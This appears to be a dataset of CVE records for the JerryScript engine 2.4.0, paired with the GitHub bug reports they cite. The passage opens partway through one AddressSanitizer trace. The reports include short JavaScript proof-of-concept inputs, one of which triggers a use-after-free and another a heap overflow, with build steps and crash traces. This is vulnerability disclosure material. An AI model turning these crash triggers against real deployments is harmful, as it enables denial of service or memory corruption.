ecma_new_ecma_string_from_utf8 /home/jerryscript/jerry-core/ecma/base/ecma-helpers-string.c:353 #7 0x8073bf5 in ecma_find_or_create_literal_string /home/jerryscript/jerry-core/ecma/base/ecma-literal-storage.c:134 #8 0x80c4501 in parser_compute_indicies /home/jerryscript/jerry-core/parser/js/js-parser.c:130 #9 0x80c61c6 in parser_post_processing /home/jerryscript/jerry-core/parser/js/js-parser.c:973 #10 0x80cbcb9 in parser_parse_source /home/jerryscript/jerry-core/parser/js/js-parser.c:2192 #11 0x80cf05a in parser_parse_script /home/jerryscript/jerry-core/parser/js/js-parser.c:2813 #12 0x804dc81 in jerry_parse /home/jerryscript/jerry-core/api/jerry.c:447 #13 0x804ac76 in main /home/jerryscript/jerry-main/main-unix.c:750 #14 0xf784a636 in __libc_start_main (/lib/i386-linux-gnu/libc.so.6+0x18636) SUMMARY: AddressSanitizer: heap-buffer-overflow /home/jerryscript/jerry-core/parser/regexp/re-parser.c:615 re_parse_char_escape Shadow bytes around the buggy address: 0x3ec00090: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x3ec000a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x3ec000b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x3ec000c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x3ec000d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa =>0x3ec000e0: fa fa 00 05 fa fa 00[07]fa fa fd fa fa fa fd fd 0x3ec000f0: fa fa 00 00 fa fa 00 00 fa fa 00 06 fa fa 00 00 0x3ec00100: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x3ec00110: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x3ec00120: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x3ec00130: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe ==105443==ABORTING ``` Credits: This vulnerability is detected by chong from OWL337.
heap-buffer-overflow in re_parse_char_escape
https://api.github.com/repos/jerryscript-project/jerryscript/issues/3871/comments
0
2020-06-07T10:51:46Z
2020-06-08T09:09:09Z
https://github.com/jerryscript-project/jerryscript/issues/3871
633,297,568
3,871
2,046
CVE-2021-26194
2021-06-10T23:15:08.333
An issue was discovered in JerryScript 2.4.0. There is a heap-use-after-free in ecma_is_lexical_environment in the ecma-helpers.c file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/jerryscript-project/jerryscript/issues/4445" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/jerryscript-project/jerryscript/issues/4445" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jerryscript:jerryscript:2.4.0:*:*:*:*:*:*:*", "matchCriteriaId": "1E97C345-3992-457E-928D-05A0B97B2A5F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "416" ]
416
https://github.com/jerryscript-project/jerryscript/issues/4445
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "jerryscript-project", "jerryscript" ]
###### JerryScript revision fdaacde6 ###### Build platform Ubuntu 16.04.6 LTS (Linux 4.4.0-179-generic x86_64) ###### Build steps ``` ./tools/build.py --clean --debug --compile-flag=-fsanitize=address \ --compile-flag=-m32 --compile-flag=-fno-omit-frame-pointer \ --compile-flag=-fno-common --compile-flag=-g --strip=off \ --system-allocator=on --logging=on --linker-flag=-fuse-ld=gold \ --error-messages=on --profile=es2015-subset ``` ###### Test case ``` var a= ["", "\0", "\t", "\n", "\v", "\f", "\r", " ", "\u00a0", "\u2028", "\u2029", "\ufeff"] Array.prototype[4] = 10; function Test() { a.sort(function() { var A = function() { }; A.prototype.x = 42; var o = new Proxy({ "3": { writable:false, value:20 } }, { getPrototypeOf: function (val, size, ch) { var result = new String(val); if (ch == null) { ch = " "; } while (result.length < size) { result = ch + result; } return result; } }); o.x = 43; var result = ""; for (var p in o) result += o[p]; return a | 0; }); WScript.Echo(a); } Test(); ``` ###### Execution steps ``` ./build/bin/jerry ./build/bin/poc.js ``` ###### Output ``` ================================================================= ==179417==ERROR: AddressSanitizer: heap-use-after-free on address 0xf5304720 at pc 0x566b5311 bp 0xff9aa468 sp 0xff9aa458 READ of size 2 at 0xf5304720 thread T0 #0 0x566b5310 in ecma_is_lexical_environment /root/jerryscript/jerry-core/ecma/base/ecma-helpers.c:177 #1 0x566b5447 in ecma_get_object_type /root/jerryscript/jerry-core/ecma/base/ecma-helpers.c:203 #2 0x56670759 in ecma_op_object_get_own_property_descriptor /root/jerryscript/jerry-core/ecma/operations/ecma-objects.c:1862 #3 0x56672f01 in ecma_op_object_enumerate /root/jerryscript/jerry-core/ecma/operations/ecma-objects.c:2513 #4 0x56612f78 in opfunc_for_in /root/jerryscript/jerry-core/vm/opcodes.c:368 #5 0x56630ffe in vm_loop.lto_priv.465 /root/jerryscript/jerry-core/vm/vm.c:3986 #6 0x565f87c3 in vm_execute /root/jerryscript/jerry-core/vm/vm.c:4953 #7 0x565f8e0c in vm_run /root/jerryscript/jerry-core/vm/vm.c:5060 #8 0x566a74be in ecma_op_function_call_simple /root/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1182 #9 0x566a8106 in ecma_op_function_call /root/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1412 #10 0x565fc0b9 in ecma_builtin_array_prototype_object_sort_compare_helper /root/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-array-prototype.c:1063 #11 0x565ddfba in ecma_builtin_helper_array_merge_sort_bottom_up /root/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-helpers-sort.c:47 #12 0x565de1f0 in ecma_builtin_helper_array_merge_sort_helper /root/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-helpers-sort.c:109 #13 0x565fc84f in ecma_builtin_array_prototype_object_sort /root/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-array-prototype.c:1184 #14 0x566030f9 in ecma_builtin_array_prototype_dispatch_routine /root/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-array-prototype.c:2918 #15 0x566cf1d0 in ecma_builtin_dispatch_routine /root/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1490 #16 0x566cf466 in ecma_builtin_dispatch_call /root/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1522 #17 0x566a7805 in ecma_op_function_call_native /root/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1246 #18 0x566a8125 in ecma_op_function_call /root/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1416 #19 0x5661dd7d in opfunc_call.lto_priv.464 /root/jerryscript/jerry-core/vm/vm.c:822 #20 0x565f8827 in vm_execute /root/jerryscript/jerry-core/vm/vm.c:4959 #21 0x565f8e0c in vm_run /root/jerryscript/jerry-core/vm/vm.c:5060 #22 0x566a74be in ecma_op_function_call_simple /root/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1182 #23 0x566a8106 in ecma_op_function_call /root/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1412 #24 0x5661dd7d in opfunc_call.lto_priv.464 /root/jerryscript/jerry-core/vm/vm.c:822 #25 0x565f8827 in vm_execute /root/jerryscript/jerry-core/vm/vm.c:4959 #26 0x565f8e0c in vm_run /root/jerryscript/jerry-core/vm/vm.c:5060 #27 0x5661c015 in vm_run_global /root/jerryscript/jerry-core/vm/vm.c:350 #28 0x566e3344 in jerry_run /root/jerryscript/jerry-core/api/jerry.c:608 #29 0x566dc51a in main /root/jerryscript/jerry-main/main-unix.c:123 #30 0xf6f11f20 in __libc_start_main (/lib32/libc.so.6+0x18f20) #31 0x565877e0 (/root/jerryscript/build3/bin/jerry+0x1d7e0) 0xf5304720 is located 0 bytes inside of 24-byte region [0xf5304720,0xf5304738) freed by thread T0 here: #0 0xf72a0b94 in __interceptor_free (/usr/lib32/libasan.so.4+0xe5b94) #1 0x566384f0 in jmem_heap_free_block_internal /root/jerryscript/jerry-core/jmem/jmem-heap.c:478 #2 0x5663889b in jmem_heap_free_block /root/jerryscript/jerry-core/jmem/jmem-heap.c:692 #3 0x565f8ed9 in ecma_dealloc_extended_object /root/jerryscript/jerry-core/ecma/base/ecma-alloc.c:123 #4 0x566f6c53 in ecma_gc_free_object /root/jerryscript/jerry-core/ecma/base/ecma-gc.c:1763 #5 0x566f78c6 in ecma_gc_run /root/jerryscript/jerry-core/ecma/base/ecma-gc.c:1891 #6 0x566f7aa6 in ecma_free_unused_memory /root/jerryscript/jerry-core/ecma/base/ecma-gc.c:1935 #7 0x56638278 in jmem_heap_gc_and_alloc_block /root/jerryscript/jerry-core/jmem/jmem-heap.c:285 #8 0x56638318 in jmem_heap_alloc_block /root/jerryscript/jerry-core/jmem/jmem-heap.c:325 #9 0x56671b58 in ecma_object_sort_property_names /root/jerryscript/jerry-core/ecma/operations/ecma-objects.c:2262 #10 0x56672c78 in ecma_op_object_own_property_keys /root/jerryscript/jerry-core/ecma/operations/ecma-objects.c:2463 #11 0x56672dba in ecma_op_object_enumerate /root/jerryscript/jerry-core/ecma/operations/ecma-objects.c:2489 #12 0x56612f78 in opfunc_for_in /root/jerryscript/jerry-core/vm/opcodes.c:368 #13 0x56630ffe in vm_loop.lto_priv.465 /root/jerryscript/jerry-core/vm/vm.c:3986 #14 0x565f87c3 in vm_execute /root/jerryscript/jerry-core/vm/vm.c:4953 #15 0x565f8e0c in vm_run /root/jerryscript/jerry-core/vm/vm.c:5060 #16 0x566a74be in ecma_op_function_call_simple /root/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1182 #17 0x566a8106 in ecma_op_function_call /root/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1412 #18 0x565fc0b9 in ecma_builtin_array_prototype_object_sort_compare_helper /root/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-array-prototype.c:1063 #19 0x565ddfba in ecma_builtin_helper_array_merge_sort_bottom_up /root/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-helpers-sort.c:47 #20 0x565de1f0 in ecma_builtin_helper_array_merge_sort_helper /root/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-helpers-sort.c:109 #21 0x565fc84f in ecma_builtin_array_prototype_object_sort /root/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-array-prototype.c:1184 #22 0x566030f9 in ecma_builtin_array_prototype_dispatch_routine /root/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-array-prototype.c:2918 #23 0x566cf1d0 in ecma_builtin_dispatch_routine /root/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1490 #24 0x566cf466 in ecma_builtin_dispatch_call /root/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1522 #25 0x566a7805 in ecma_op_function_call_native /root/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1246 #26 0x566a8125 in ecma_op_function_call /root/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1416 #27 0x5661dd7d in opfunc_call.lto_priv.464 /root/jerryscript/jerry-core/vm/vm.c:822 #28 0x565f8827 in vm_execute /root/jerryscript/jerry-core/vm/vm.c:4959 #29 0x565f8e0c in vm_run /root/jerryscript/jerry-core/vm/vm.c:5060 previously allocated by thread T0 here: #0 0xf72a0f54 in malloc (/usr/lib32/libasan.so.4+0xe5f54) #1 0x566381a8 in jmem_heap_alloc /root/jerryscript/jerry-core/jmem/jmem-heap.c:254 #2 0x56638286 in jmem_heap_gc_and_alloc_block /root/jerryscript/jerry-core/jmem/jmem-heap.c:291 #3 0x56638318 in jmem_heap_alloc_block /root/jerryscript/jerry-core/jmem/jmem-heap.c:325 #4 0x565f8eb6 in ecma_alloc_extended_object /root/jerryscript/jerry-core/ecma/base/ecma-alloc.c:109 #5 0x566b4dfa in ecma_create_object /root/jerryscript/jerry-core/ecma/base/ecma-helpers.c:82 #6 0x5668ae26 in ecma_op_create_string_object /root/jerryscript/jerry-core/ecma/operations/ecma-string-object.c:83 #7 0x565f76f7 in ecma_builtin_string_dispatch_construct /root/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-string.c:387 #8 0x566cf78a in ecma_builtin_dispatch_construct /root/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1555 #9 0x566a8631 in ecma_op_function_construct /root/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1562 #10 0x5661e2f4 in opfunc_construct.lto_priv.461 /root/jerryscript/jerry-core/vm/vm.c:907 #11 0x565f8865 in vm_execute /root/jerryscript/jerry-core/vm/vm.c:4980 #12 0x565f8e0c in vm_run /root/jerryscript/jerry-core/vm/vm.c:5060 #13 0x566a74be in ecma_op_function_call_simple /root/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1182 #14 0x566a8106 in ecma_op_function_call /root/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1412 #15 0x56678cd3 in ecma_proxy_object_get_prototype_of /root/jerryscript/jerry-core/ecma/operations/ecma-proxy-object.c:318 #16 0x56673108 in ecma_op_object_enumerate /root/jerryscript/jerry-core/ecma/operations/ecma-objects.c:2552 #17 0x56612f78 in opfunc_for_in /root/jerryscript/jerry-core/vm/opcodes.c:368 #18 0x56630ffe in vm_loop.lto_priv.465 /root/jerryscript/jerry-core/vm/vm.c:3986 #19 0x565f87c3 in vm_execute /root/jerryscript/jerry-core/vm/vm.c:4953 #20 0x565f8e0c in vm_run /root/jerryscript/jerry-core/vm/vm.c:5060 #21 0x566a74be in ecma_op_function_call_simple /root/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1182 #22 0x566a8106 in ecma_op_function_call /root/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1412 #23 0x565fc0b9 in ecma_builtin_array_prototype_object_sort_compare_helper /root/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-array-prototype.c:1063 #24 0x565ddfba in ecma_builtin_helper_array_merge_sort_bottom_up /root/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-helpers-sort.c:47 #25 0x565de1f0 in ecma_builtin_helper_array_merge_sort_helper /root/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-helpers-sort.c:109 #26 0x565fc84f in ecma_builtin_array_prototype_object_sort /root/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-array-prototype.c:1184 #27 0x566030f9 in ecma_builtin_array_prototype_dispatch_routine /root/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-array-prototype.c:2918 #28 0x566cf1d0 in ecma_builtin_dispatch_routine /root/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1490 #29 0x566cf466 in ecma_builtin_dispatch_call /root/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1522 SUMMARY: AddressSanitizer: heap-use-after-free /root/jerryscript/jerry-core/ecma/base/ecma-helpers.c:177 in ecma_is_lexical_environment Shadow bytes around the buggy address: 0x3ea60890: fd fd fd fa fa fa fd fd fd fa fa fa fd fd fd fa 0x3ea608a0: fa fa fd fd fd fa fa fa fd fd fd fa fa fa fd fd 0x3ea608b0: fd fa fa fa fd fd fd fa fa fa fa fa fa fa fa fa 0x3ea608c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x3ea608d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa =>0x3ea608e0: fa fa fa fa[fd]fd fd fa fa fa fd fd fd fa fa fa 0x3ea608f0: fd fd fd fa fa fa fd fd fd fa fa fa 00 00 00 fa 0x3ea60900: fa fa 00 00 00 fa fa fa 00 00 00 fa fa fa 00 00 0x3ea60910: 00 fa fa fa 00 00 00 fa fa fa 00 00 00 fa fa fa 0x3ea60920: 00 00 00 fa fa fa 00 00 00 fa fa fa fd fd fd fd 0x3ea60930: fa fa fd fd fd fd fa fa fd fd fd fd fa fa fd fd Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==179417==ABORTING ``` Credits: Found by chong from OWL337.
heap-use-after-free in ecma_is_lexical_environment
https://api.github.com/repos/jerryscript-project/jerryscript/issues/4445/comments
1
2021-01-11T13:28:31Z
2024-12-17T09:23:30Z
https://github.com/jerryscript-project/jerryscript/issues/4445
783,371,449
4,445
2,047
CVE-2021-26195
2021-06-10T23:15:08.370
An issue was discovered in JerryScript 2.4.0. There is a heap-buffer-overflow in lexer_parse_number in js-lexer.c file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/jerryscript-project/jerryscript/issues/4442" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/jerryscript-project/jerryscript/issues/4442" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jerryscript:jerryscript:2.4.0:*:*:*:*:*:*:*", "matchCriteriaId": "1E97C345-3992-457E-928D-05A0B97B2A5F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/jerryscript-project/jerryscript/issues/4442
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "jerryscript-project", "jerryscript" ]
###### JerryScript revision fdaacde ###### Build platform Ubuntu 18.04.5 LTS(Linux 4.15.0-119-generic x86_64) ###### Build steps ``` ./tools/build.py --clean --debug --compile-flag=-fsanitize=address \ --compile-flag=-m32 --compile-flag=-fno-omit-frame-pointer \ --compile-flag=-fno-common --compile-flag=-g --strip=off \ --system-allocator=on --logging=on --linker-flag=-fuse-ld=gold \ --error-messages=on --profile=es2015-subset ``` ###### Test case ``` eval('0x100000000_'); ``` ###### Output ``` ================================================================= ==15467==ERROR: AddressSanitizer: heap-buffer-overflow on address 0xf5b00925 at pc 0x5673c8d4 bp 0xffe81f18 sp 0xffe81f08 READ of size 1 at 0xf5b00925 thread T0 #0 0x5673c8d3 in lexer_parse_number /root/jerryscript/jerry-core/parser/js/js-lexer.c:1396 #1 0x5673da94 in lexer_next_token /root/jerryscript/jerry-core/parser/js/js-lexer.c:1662 #2 0x566c3e07 in scanner_scan_all /root/jerryscript/jerry-core/parser/js/js-scanner.c:2518 #3 0x566a657a in parser_parse_source /root/jerryscript/jerry-core/parser/js/js-parser.c:1896 #4 0x566abd30 in parser_parse_script /root/jerryscript/jerry-core/parser/js/js-parser.c:2806 #5 0x5665fe7c in ecma_op_eval_chars_buffer /root/jerryscript/jerry-core/ecma/operations/ecma-eval.c:99 #6 0x5665fc4e in ecma_op_eval /root/jerryscript/jerry-core/ecma/operations/ecma-eval.c:58 #7 0x5670d998 in ecma_builtin_global_object_eval /root/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-global.c:110 #8 0x5670f33a in ecma_builtin_global_dispatch_routine /root/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-global.c:607 #9 0x5663f710 in ecma_builtin_dispatch_routine /root/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1490 #10 0x5663f9a6 in ecma_builtin_dispatch_call /root/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1522 #11 0x56663e87 in ecma_op_function_call_native /root/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1246 #12 0x56664810 in ecma_op_function_call /root/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1416 #13 0x566de64b in opfunc_call /root/jerryscript/jerry-core/vm/vm.c:822 #14 0x566f80af in vm_execute /root/jerryscript/jerry-core/vm/vm.c:4959 #15 0x566f86aa in vm_run /root/jerryscript/jerry-core/vm/vm.c:5060 #16 0x566dc8bc in vm_run_global /root/jerryscript/jerry-core/vm/vm.c:350 #17 0x565f388a in jerry_run /root/jerryscript/jerry-core/api/jerry.c:608 #18 0x565ec669 in main /root/jerryscript/jerry-main/main-unix.c:123 #19 0xf7722f20 in __libc_start_main (/lib32/libc.so.6+0x18f20) #20 0x565ebea0 (/root/jerryscript/build/bin/jerry+0x1eea0) 0xf5b00925 is located 0 bytes to the right of 21-byte region [0xf5b00910,0xf5b00925) allocated by thread T0 here: #0 0xf7a93f54 in malloc (/usr/lib32/libasan.so.4+0xe5f54) #1 0x56695fd4 in jmem_heap_alloc /root/jerryscript/jerry-core/jmem/jmem-heap.c:254 #2 0x566960ce in jmem_heap_gc_and_alloc_block /root/jerryscript/jerry-core/jmem/jmem-heap.c:291 #3 0x56696161 in jmem_heap_alloc_block /root/jerryscript/jerry-core/jmem/jmem-heap.c:325 #4 0x566f890c in ecma_alloc_string_buffer /root/jerryscript/jerry-core/ecma/base/ecma-alloc.c:222 #5 0x56615741 in ecma_new_ecma_string_from_utf8_buffer /root/jerryscript/jerry-core/ecma/base/ecma-helpers-string.c:263 #6 0x56615741 in ecma_new_ecma_string_from_utf8 /root/jerryscript/jerry-core/ecma/base/ecma-helpers-string.c:357 #7 0x5662c6f0 in ecma_find_or_create_literal_string /root/jerryscript/jerry-core/ecma/base/ecma-literal-storage.c:170 #8 0x566a314a in parser_post_processing /root/jerryscript/jerry-core/parser/js/js-parser.c:1312 #9 0x566a7726 in parser_parse_source /root/jerryscript/jerry-core/parser/js/js-parser.c:2019 #10 0x566abd30 in parser_parse_script /root/jerryscript/jerry-core/parser/js/js-parser.c:2806 #11 0x565f340b in jerry_parse /root/jerryscript/jerry-core/api/jerry.c:459 #12 0x565ec536 in main /root/jerryscript/jerry-main/main-unix.c:112 #13 0xf7722f20 in __libc_start_main (/lib32/libc.so.6+0x18f20) SUMMARY: AddressSanitizer: heap-buffer-overflow /root/jerryscript/jerry-core/parser/js/js-lexer.c:1396 in lexer_parse_number Shadow bytes around the buggy address: 0x3eb600d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x3eb600e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x3eb600f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x3eb60100: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x3eb60110: fa fa fa fa fa fa 00 00 00 fa fa fa 00 00 00 fa =>0x3eb60120: fa fa 00 00[05]fa fa fa fd fd fd fa fa fa 00 00 0x3eb60130: 00 fa fa fa 00 00 00 00 fa fa 00 00 04 fa fa fa 0x3eb60140: 00 00 00 00 fa fa 00 00 05 fa fa fa 00 00 00 fa 0x3eb60150: fa fa 00 00 00 00 fa fa 00 00 00 00 fa fa 00 00 0x3eb60160: 00 fa fa fa 00 00 00 00 fa fa 00 00 00 00 fa fa 0x3eb60170: 00 00 00 00 fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==15467==ABORTING ``` Credits: Found by chong from OWL337.
heap-buffer-overflow in lexer_parse_number
https://api.github.com/repos/jerryscript-project/jerryscript/issues/4442/comments
0
2021-01-11T13:04:23Z
2021-01-11T17:48:54Z
https://github.com/jerryscript-project/jerryscript/issues/4442
783,354,413
4,442
2,048
CVE-2021-26197
2021-06-10T23:15:08.403
An issue was discovered in JerryScript 2.4.0. There is a SEGV in main_print_unhandled_exception in main-utils.c file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/jerryscript-project/jerryscript/issues/4403" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/jerryscript-project/jerryscript/issues/4403" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jerryscript:jerryscript:2.4.0:*:*:*:*:*:*:*", "matchCriteriaId": "1E97C345-3992-457E-928D-05A0B97B2A5F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "754" ]
754
https://github.com/jerryscript-project/jerryscript/issues/4403
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "jerryscript-project", "jerryscript" ]
